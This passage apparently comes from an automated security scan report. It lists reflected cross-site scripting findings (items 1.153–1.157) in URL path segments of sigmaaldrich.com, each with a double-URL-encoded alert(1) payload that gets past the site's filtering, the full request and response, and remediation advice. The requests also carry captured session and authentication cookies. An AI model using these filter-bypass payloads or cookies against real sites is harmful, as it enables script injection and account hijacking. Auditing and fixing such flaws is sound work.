Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentacfbb";alert(1)//7b1a87dc9b4/sigma-aldrich/customer-support/customer-service/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.153. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1a12%2522%253balert%25281%2529%252f%252f35931b76d34 was submitted in the REST URL parameter 2. This input was echoed as d1a12";alert(1)//35931b76d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd1a12%2522%253balert%25281%2529%252f%252f35931b76d34/customer-support/customer-service/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd1a12";alert(1)//35931b76d34/customer-support/customer-service/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.154. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f32%2522%253balert%25281%2529%252f%252fde0fca75292 was submitted in the REST URL parameter 3. This input was echoed as a9f32";alert(1)//de0fca75292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supporta9f32%2522%253balert%25281%2529%252f%252fde0fca75292/customer-service/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supporta9f32";alert(1)//de0fca75292/customer-service/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.155. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f4c%2522%253balert%25281%2529%252f%252f09cfe3811 was submitted in the REST URL parameter 4. This input was echoed as 28f4c";alert(1)//09cfe3811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service28f4c%2522%253balert%25281%2529%252f%252f09cfe3811/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28981
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service28f4c";alert(1)//09cfe3811/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.156. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b360f%2522%253balert%25281%2529%252f%252fa8d8a144874 was submitted in the REST URL parameter 5. This input was echoed as b360f";alert(1)//a8d8a144874 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicesb360f%2522%253balert%25281%2529%252f%252fa8d8a144874/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicesb360f";alert(1)//a8d8a144874/basic-research","E404") ;
   </script>
...[SNIP]...

1.157. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3d39%2522%253balert%25281%2529%252f%252fbaba3e27b12 was submitted in the REST URL parameter 6. This input was echoed as f3d39";alert(1)//baba3e27b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-researchf3d39%2522%253balert%25281%2529%252f%252fbaba3e27b12 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
